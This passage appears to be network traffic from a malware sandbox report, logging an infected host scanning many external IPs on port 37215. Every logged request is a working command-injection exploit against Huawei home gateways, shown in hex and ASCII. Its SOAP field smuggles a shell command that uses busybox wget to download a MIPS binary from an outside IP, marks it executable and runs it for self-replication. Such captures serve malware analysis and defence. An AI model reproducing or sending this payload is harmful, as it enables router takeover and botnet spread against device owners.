                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        187192.168.2.2341620197.73.148.20737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.283772945 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        188192.168.2.235212641.210.190.22637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.283783913 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        189192.168.2.2334892157.15.207.2637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.283826113 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        190192.168.2.2356242197.152.109.13337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.283826113 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        191192.168.2.233834041.220.185.25537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.283849955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        192192.168.2.2339912157.242.87.13737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.283849955 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        193192.168.2.2344062197.2.243.1937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.307615995 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        194192.168.2.2355308197.114.174.18537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312233925 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        195192.168.2.235226841.169.59.14037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312243938 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        196192.168.2.2335060157.110.164.537215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:05.312314034 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
